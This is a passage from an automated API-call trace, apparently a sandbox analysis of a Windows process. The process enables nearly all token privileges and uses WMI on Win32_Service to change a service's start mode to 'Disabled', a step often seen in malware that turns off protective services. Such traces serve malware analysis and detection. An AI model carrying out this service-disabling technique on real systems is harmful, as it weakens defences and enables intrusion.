lFlags=0, pVal=0xdaec90*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xdaec90*(varType=0x200d, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xf30228*(cDims=0x1, fFeatures=0x240, cbElements=0x4, cLocks=0x0, pvData=0xf232f0, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0116.673] IWbemClassObject:Get (in: This=0xf52038, wszName="VerbType", lFlags=0, pVal=0xdaec28*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xdaec28*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0116.673] IWbemClassObject:Get (in: This=0xf52038, wszName="Derivation", lFlags=0, pVal=0xdaec10*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xdaec10*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ChangeStartMode", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0116.673] lstrlenW (lpString="ChangeStartMode") returned 15 [0116.673] lstrlenW (lpString="ChangeStartMode") returned 15 [0116.673] SafeArrayGetLBound (in: psa=0xf30228, nDim=0x1, plLbound=0xdaecc4 | out: plLbound=0xdaecc4) returned 0x0 [0116.673] SafeArrayGetUBound (in: psa=0xf30228, nDim=0x1, plUbound=0xdaece0 | out: plUbound=0xdaece0) returned 0x0 [0116.673] SafeArrayGetElement (in: psa=0xf30228, rgIndices=0xdaece4, pv=0xdaecf0 | out: pv=0xdaecf0) returned 0x0 [0116.673] IWbemClassObject:Get (in: This=0xf530d0, wszName="ParaId", lFlags=0, pVal=0xdaec40*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xdaec40*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StartMode", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0116.673] IWbemClassObject:Get (in: This=0xf530d0, wszName="Type", lFlags=0, pVal=0xdaebd8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xdaebd8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="STRING", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0116.673] IWbemClassObject:Get (in: This=0xf530d0, wszName="Default", lFlags=0, pVal=0xdaebf8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xdaebf8*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0116.673] GetCurrentThreadId () returned 0xf74 [0116.673] ??0CHString@@QAE@XZ () returned 0xdaeb2c [0116.673] IWbemClassObject:Get (in: This=0xf530d0, wszName="Qualifiers", lFlags=0, pVal=0xdaeab4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xdaeab4*(varType=0x200d, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xf30498*(cDims=0x1, fFeatures=0x240, cbElements=0x4, cLocks=0x0, pvData=0xf233d0, rgsabound=((cElements=0x2, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0116.673] SafeArrayGetLBound (in: psa=0xf30498, nDim=0x1, plLbound=0xdaeae4 | out: plLbound=0xdaeae4) returned 0x0 [0116.673] SafeArrayGetUBound (in: psa=0xf30498, nDim=0x1, plUbound=0xdaeaf8 | out: plUbound=0xdaeaf8) returned 0x0 [0116.673] SafeArrayGetElement (in: psa=0xf30498, rgIndices=0xdaeb04, pv=0xdaeb24 | out: pv=0xdaeb24) returned 0x0 [0116.673] IWbemClassObject:Get (in: This=0xf53388, wszName="Name", lFlags=0, pVal=0xdaeacc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xdaeacc*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="In", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0116.673] IWbemClassObject:Get (in: This=0xf53388, wszName="QualifierValue", lFlags=0, pVal=0xdaeaa4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xdaeaa4*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xf30108*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0xf233e0, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0116.674] SafeArrayGetLBound (in: psa=0xf30108, nDim=0x1, plLbound=0xdaeae8 | out: plLbound=0xdaeae8) returned 0x0 [0116.674] SafeArrayGetUBound (in: psa=0xf30108, nDim=0x1, plUbound=0xdaeac8 | out: plUbound=0xdaeac8) returned 0x0 [0116.674] lstrlenW (lpString="CIMTYPE") returned 7 [0116.674] lstrlenW (lpString="In") returned 2 [0116.674] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="In", cchCount1=2, lpString2="CIMTYPE", cchCount2=7) returned 3 [0116.674] lstrlenW (lpString="read") returned 4 [0116.674] lstrlenW (lpString="In") returned 2 [0116.674] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="In", cchCount1=2, lpString2="read", cchCount2=4) returned 1 [0116.674] lstrlenW (lpString="write") returned 5 [0116.674] lstrlenW (lpString="In") returned 2 [0116.674] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="In", cchCount1=2, lpString2="write", cchCount2=5) returned 1 [0116.674] lstrlenW (lpString="In") returned 2 [0116.674] lstrlenW (lpString="In") returned 2 [0116.674] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="In", cchCount1=2, lpString2="In", cchCount2=2) returned 2 [0116.674] SafeArrayGetElement (in: psa=0xf30108, rgIndices=0xdaeb10, pv=0xdaeb18 | out: pv=0xdaeb18) returned 0x0 [0116.674] lstrlenW (lpString="true") returned 4 [0116.674] lstrlenW (lpString="True") returned 4 [0116.674] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="True", cchCount1=4, lpString2="true", cchCount2=4) returned 2 [0116.674] IUnknown:Release (This=0xf53388) returned 0x1 [0116.674] SafeArrayGetElement (in: psa=0xf30498, rgIndices=0xdaeb04, pv=0xdaeb24 | out: pv=0xdaeb24) returned 0x0 [0116.674] IWbemClassObject:Get (in: This=0xf536c0, wszName="Name", lFlags=0, pVal=0xdaeacc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xf22504, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xdaeacc*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ValueMap", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0116.674] IWbemClassObject:Get (in: This=0xf536c0, wszName="QualifierValue", lFlags=0, pVal=0xdaeaa4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xf30108, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xdaeaa4*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xf30468*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0xf22d98, rgsabound=((cElements=0x5, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0116.674] SafeArrayGetLBound (in: psa=0xf30468, nDim=0x1, plLbound=0xdaeae8 | out: plLbound=0xdaeae8) returned 0x0 [0116.674] SafeArrayGetUBound (in: psa=0xf30468, nDim=0x1, plUbound=0xdaeac8 | out: plUbound=0xdaeac8) returned 0x0 [0116.674] lstrlenW (lpString="CIMTYPE") returned 7 [0116.674] lstrlenW (lpString="ValueMap") returned 8 [0116.674] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ValueMap", cchCount1=8, lpString2="CIMTYPE", cchCount2=7) returned 3 [0116.674] lstrlenW (lpString="read") returned 4 [0116.674] lstrlenW (lpString="ValueMap") returned 8 [0116.674] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ValueMap", cchCount1=8, lpString2="read", cchCount2=4) returned 3 [0116.674] lstrlenW (lpString="write") returned 5 [0116.674] lstrlenW (lpString="ValueMap") returned 8 [0116.674] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ValueMap", cchCount1=8, lpString2="write", cchCount2=5) returned 1 [0116.674] lstrlenW (lpString="In") returned 2 [0116.674] lstrlenW (lpString="ValueMap") returned 8 [0116.674] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ValueMap", cchCount1=8, lpString2="In", cchCount2=2) returned 3 [0116.674] lstrlenW (lpString="Out") returned 3 [0116.674] lstrlenW (lpString="ValueMap") returned 8 [0116.674] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ValueMap", cchCount1=8, lpString2="Out", cchCount2=3) returned 3 [0116.674] SafeArrayGetElement (in: psa=0xf30468, rgIndices=0xdaeb10, pv=0xdaeb18 | out: pv=0xdaeb18) returned 0x0 [0116.675] SafeArrayGetElement (in: psa=0xf30468, rgIndices=0xdaeb10, pv=0xdaeb18 | out: pv=0xdaeb18) returned 0x0 [0116.675] SafeArrayGetElement (in: psa=0xf30468, rgIndices=0xdaeb10, pv=0xdaeb18 | out: pv=0xdaeb18) returned 0x0 [0116.675] SafeArrayGetElement (in: psa=0xf30468, rgIndices=0xdaeb10, pv=0xdaeb18 | out: pv=0xdaeb18) returned 0x0 [0116.675] SafeArrayGetElement (in: psa=0xf30468, rgIndices=0xdaeb10, pv=0xdaeb18 | out: pv=0xdaeb18) returned 0x0 [0116.675] SysStringLen (param_1="ValueMap") returned 0x8 [0116.675] SysStringLen (param_1="In") returned 0x2 [0116.675] SysStringLen (param_1="In") returned 0x2 [0116.675] SysStringLen (param_1="ValueMap") returned 0x8 [0116.675] IUnknown:Release (This=0xf536c0) returned 0x1 [0116.675] ??1CHString@@QAE@XZ () returned 0x74a66430 [0116.675] IUnknown:Release (This=0xf530d0) returned 0x1 [0116.675] IUnknown:Release (This=0xf52038) returned 0x1 [0116.675] IUnknown:Release (This=0xf45df0) returned 0x0 [0116.676] ??1CHString@@QAE@XZ () returned 0x74a66430 [0116.676] lstrlenW (lpString="/") returned 1 [0116.676] lstrlenW (lpString="Disabled") returned 8 [0116.676] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Disabled", cchCount1=8, lpString2="/", cchCount2=1) returned 3 [0116.676] lstrlenW (lpString="-") returned 1 [0116.676] lstrlenW (lpString="Disabled") returned 8 [0116.676] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Disabled", cchCount1=8, lpString2="-", cchCount2=1) returned 3 [0116.676] lstrlenW (lpString="Disabled") returned 8 [0116.676] lstrlenW (lpString="Disabled") returned 8 [0116.676] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0116.676] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0116.676] wcstok (in: _String="Select * from Win32_Service", _Delimiter=" ", _Context=0x337ff2f4 | out: _String="Select", _Context=0x337ff2f4) returned="Select" [0116.676] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x337ff2f4 | out: _String=0x0, _Context=0x337ff2f4) returned="*" [0116.676] lstrlenW (lpString="FROM") returned 4 [0116.676] lstrlenW (lpString="*") returned 1 [0116.676] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0116.676] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x337ff2f4 | out: _String=0x0, _Context=0x337ff2f4) returned="from" [0116.677] lstrlenW (lpString="FROM") returned 4 [0116.677] lstrlenW (lpString="from") returned 4 [0116.677] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0116.677] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x337ff2f4 | out: _String=0x0, _Context=0x337ff2f4) returned="Win32_Service" [0116.677] lstrlenW (lpString="SET") returned 3 [0116.677] lstrlenW (lpString="CALL") returned 4 [0116.677] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0116.677] lstrlenW (lpString="CREATE") returned 6 [0116.677] lstrlenW (lpString="CALL") returned 4 [0116.677] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0116.677] lstrlenW (lpString="GET") returned 3 [0116.677] lstrlenW (lpString="CALL") returned 4 [0116.677] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0116.677] lstrlenW (lpString="LIST") returned 4 [0116.677] lstrlenW (lpString="CALL") returned 4 [0116.677] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0116.677] lstrlenW (lpString="ASSOC") returned 5 [0116.677] lstrlenW (lpString="CALL") returned 4 [0116.677] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="ASSOC", cchCount2=5) returned 3 [0116.677] WbemLocator:IUnknown:AddRef (This=0xf034c8) returned 0x3 [0116.677] lstrlenW (lpString="") returned 0 [0116.677] lstrlenW (lpString="LHNIWSJ") returned 7 [0116.677] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="", cchCount2=0) returned 3 [0116.677] lstrlenW (lpString="LHNIWSJ") returned 7 [0116.677] lstrlenW (lpString="LHNIWSJ") returned 7 [0116.677] GetCurrentThreadId () returned 0xf74 [0116.677] GetCurrentProcess () returned 0xffffffff [0116.677] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0xdaf620 | out: TokenHandle=0xdaf620*=0x270) returned 1 [0116.677] GetTokenInformation (in: TokenHandle=0x270, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xdaf61c | out: TokenInformation=0x0, ReturnLength=0xdaf61c) returned 0 [0116.677] GetTokenInformation (in: TokenHandle=0x270, TokenInformationClass=0x3, TokenInformation=0x1159148, TokenInformationLength=0x118, ReturnLength=0xdaf61c | out: TokenInformation=0x1159148, ReturnLength=0xdaf61c) returned 1 [0116.677] AdjustTokenPrivileges (in: TokenHandle=0x270, DisableAllPrivileges=0, NewState=0x1159148*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0116.677] CloseHandle (hObject=0x270) returned 1 [0116.677] lstrlenW (lpString="GET") returned 3 [0116.677] lstrlenW (lpString="CALL") returned 4 [0116.677] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0116.677] lstrlenW (lpString="LIST") returned 4 [0116.677] lstrlenW (lpString="CALL") returned 4 [0116.677] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0116.678] lstrlenW (lpString="SET") returned 3 [0116.678] lstrlenW (lpString="CALL") returned 4 [0116.678] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0116.678] lstrlenW (lpString="CALL") returned 4 [0116.678] lstrlenW (lpString="CALL") returned 4 [0116.678] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0116.678] ??0CHString@@QAE@XZ () returned 0xdaf5e0 [0116.678] GetCurrentThreadId () returned 0xf74 [0116.678] SysStringLen (param_1="\\\\") returned 0x2 [0116.678] SysStringLen (param_1="LHNIWSJ") returned 0x7 [0116.678] SysStringLen (param_1="\\\\LHNIWSJ") returned 0x9 [0116.678] SysStringLen (param_1="\\") returned 0x1 [0116.678] SysStringLen (param_1="\\\\LHNIWSJ\\") returned 0xa [0116.678] SysStringLen (param_1="ROOT\\CIMV2") returned 0xa [0116.678] WbemLocator:IWbemLocator:ConnectServer (in: This=0xf034c8, strNetworkResource="\\\\LHNIWSJ\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x1349564 | out: ppNamespace=0x1349564*=0xf209a0) returned 0x0 [0116.684] CoSetProxyBlanket (pProxy=0xf209a0, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0116.684] ??1CHString@@QAE@XZ () returned 0x74a66430 [0116.684] ??0CHString@@QAE@XZ () returned 0xdaf5dc [0116.684] GetCurrentThreadId () returned 0xf74 [0116.684] lstrlenA (lpString="") returned 0 [0116.684] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1302b44, cbMultiByte=-1, lpWideCharStr=0x1153b38, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0116.685] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0116.685] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0116.685] wcstok (in: _String="Select * from Win32_Service", _Delimiter=" ", _Context=0x337ff010 | out: _String="Select", _Context=0x337ff010) returned="Select" [0116.685] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x337ff010 | out: _String=0x0, _Context=0x337ff010) returned="*" [0116.685] lstrlenW (lpString="FROM") returned 4 [0116.685] lstrlenW (lpString="*") returned 1 [0116.685] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0116.685] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x337ff010 | out: _String=0x0, _Context=0x337ff010) returned="from" [0116.685] lstrlenW (lpString="FROM") returned 4 [0116.685] lstrlenW (lpString="from") returned 4 [0116.685] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0116.685] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x337ff010 | out: _String=0x0, _Context=0x337ff010) returned="Win32_Service" [0116.685] IWbemServices:GetObject (in: This=0xf209a0, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0xdaf5b4*=0x0, ppCallResult=0x0 | out: ppObject=0xdaf5b4*=0xf7c138, ppCallResult=0x0) returned 0x0 [0116.717] IWbemClassObject:GetMethod (in: This=0xf7c138, wszName="ChangeStartMode", lFlags=0, ppInSignature=0xdaf5c0, ppOutSignature=0xdaf5ac | out: ppInSignature=0xdaf5c0*=0xf7c628, ppOutSignature=0xdaf5ac*=0xf7c9a8) returned 0x0 [0116.717] IWbemClassObject:SpawnInstance (in: This=0xf7c628, lFlags=0, ppNewInstance=0xdaf5cc | out: ppNewInstance=0xdaf5cc*=0xf7cba0) returned 0x0 [0116.718] IWbemClassObject:GetNames (in: This=0xf7c628, wszQualifierName=0x0, lFlags=64, pQualifierVal=0x0, pNames=0xdaf5d0 | out: pNames=0xdaf5d0*="\x01ƀ\x04") returned 0x0 [0116.718] SafeArrayGetLBound (in: psa=0xf30108, nDim=0x1, plLbound=0xdaf57c | out: plLbound=0xdaf57c) returned 0x0 [0116.718] SafeArrayGetUBound (in: psa=0xf30108, nDim=0x1, plUbound=0xdaf5c4 | out: plUbound=0xdaf5c4) returned 0x0 [0116.718] SafeArrayGetElement (in: psa=0xf30108, rgIndices=0xdaf5b8, pv=0xdaf5e0 | out: pv=0xdaf5e0) returned 0x0 [0116.718] IWbemClassObject:GetPropertyQualifierSet (in: This=0xf7cba0, wszProperty="StartMode", ppQualSet=0xdaf4a0 | out: ppQualSet=0xdaf4a0*=0xf2f8b8) returned 0x0 [0116.718] IWbemQualifierSet:Get (in: This=0xf2f8b8, wszName="CIMTYPE", lFlags=0, pVal=0xdaf470*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0xdaf470*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="string", varVal2=0x0), plFlavor=0x0) returned 0x0 [0116.718] IWbemClassObject:Get (in: This=0xf7cba0, wszName="StartMode", lFlags=0, pVal=0xdaf448*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xdaf484*=14349420, plFlavor=0x0 | out: pVal=0xdaf448*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Automatic", varVal2=0x0), pType=0xdaf484*=8, plFlavor=0x0) returned 0x0 [0116.718] IWbemQualifierSet:Get (in: This=0xf2f8b8, wszName="read", lFlags=0, pVal=0xdaf488*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0xdaf488*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0116.718] IWbemQualifierSet:Get (in: This=0xf2f8b8, wszName="write", lFlags=0, pVal=0xdaf488*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0xdaf488*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0116.718] IWbemQualifierSet:Get (in: This=0xf2f8b8, wszName="Description", lFlags=0, pVal=0xdaf460*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0xdaf460*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0116.718] lstrlenA (lpString="Not Available") returned 13 [0116.719] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1301d64, cbMultiByte=-1, lpWideCharStr=0x11592b8, cchWideChar=14 | out: lpWideCharStr="Not Available") returned 14 [0116.719] IUnknown:Release (This=0xf2f8b8) returned 0x0 [0116.719] lstrlenW (lpString="StartMode") returned 9 [0116.719] lstrlenW (lpString="StartMode") returned 9 [0116.719] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="StartMode", cchCount1=9, lpString2="StartMode", cchCount2=9) returned 2 [0116.719] SysStringLen (param_1="In") returned 0x2 [0116.719] SysStringLen (param_1="MaxLen") returned 0x6 [0116.719] SysStringLen (param_1="ValueMap") returned 0x8 [0116.719] SysStringLen (param_1="MaxLen") returned 0x6 [0116.719] SysStringLen (param_1="MaxLen") returned 0x6 [0116.719] SysStringLen (param_1="ValueMap") returned 0x8 [0116.719] lstrlenW (lpString="") returned 0 [0116.719] lstrlenW (lpString="STRING") returned 6 [0116.719] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="STRING", cchCount1=6, lpString2="", cchCount2=0) returned 3 [0116.719] lstrlenW (lpString="string") returned 6 [0116.719] lstrlenW (lpString="STRING") returned 6 [0116.719] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="STRING", cchCount1=6, lpString2="string", cchCount2=6) returned 2 [0116.719] SysStringLen (param_1="In") returned 0x2 [0116.719] SysStringLen (param_1="ValueMap") returned 0x8 [0116.719] SysStringLen (param_1="ValueMap") returned 0x8 [0116.719] SysStringLen (param_1="ValueMap") returned 0x8 [0116.719] SysStringLen (param_1="ValueMap") returned 0x8 [0116.719] SysStringLen (param_1="ValueMap") returned 0x8 [0116.719] lstrlenW (lpString="Boot") returned 4 [0116.719] lstrlenW (lpString="Disabled") returned 8 [0116.719] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Disabled", cchCount1=8, lpString2="Boot", cchCount2=4) returned 3 [0116.719] lstrlenW (lpString="System") returned 6 [0116.719] lstrlenW (lpString="Disabled") returned 8 [0116.719] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Disabled", cchCount1=8, lpString2="System", cchCount2=6) returned 1 [0116.719] lstrlenW (lpString="Automatic") returned 9 [0116.719] lstrlenW (lpString="Disabled") returned 8 [0116.719] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Disabled", cchCount1=8, lpString2="Automatic", cchCount2=9) returned 3 [0116.719] lstrlenW (lpString="Manual") returned 6 [0116.719] lstrlenW (lpString="Disabled") returned 8 [0116.719] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Disabled", cchCount1=8, lpString2="Manual", cchCount2=6) returned 1 [0116.719] lstrlenW (lpString="Disabled") returned 8 [0116.719] lstrlenW (lpString="Disabled") returned 8 [0116.720] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Disabled", cchCount1=8, lpString2="Disabled", cchCount2=8) returned 2 [0116.720] IWbemClassObject:GetPropertyQualifierSet (in: This=0xf7cba0, wszProperty="StartMode", ppQualSet=0xdaf4a8 | out: ppQualSet=0xdaf4a8*=0xf2fb20) returned 0x0 [0116.720] IWbemQualifierSet:Get (in: This=0xf2fb20, wszName="CIMTYPE", lFlags=0, pVal=0xdaf48c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0xdaf48c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="string", varVal2=0x0), plFlavor=0x0) returned 0x0 [0116.720] IWbemClassObject:Get (in: This=0xf7cba0, wszName="StartMode", lFlags=0, pVal=0xdaf47c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0xdaf49c*=14348828, plFlavor=0x0 | out: pVal=0xdaf47c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Automatic", varVal2=0x0), pType=0xdaf49c*=8, plFlavor=0x0) returned 0x0 [0116.720] IUnknown:Release (This=0xf2fb20) returned 0x0 [0116.720] lstrlenW (lpString="string") returned 6 [0116.720] lstrlenW (lpString="string") returned 6 [0116.720] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="string", cchCount1=6, lpString2="string", cchCount2=6) returned 2 [0116.720] IWbemClassObject:Put (This=0xf7cba0, wszName="StartMode", lFlags=0, pVal=0xdaf540*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Disabled", varVal2=0xf26ea4), Type=0) returned 0x0 [0116.720] IUnknown:Release (This=0xf7c628) returned 0x0 [0116.720] IUnknown:Release (This=0xf7c9a8) returned 0x0 [0116.720] IUnknown:Release (This=0xf7c138) returned 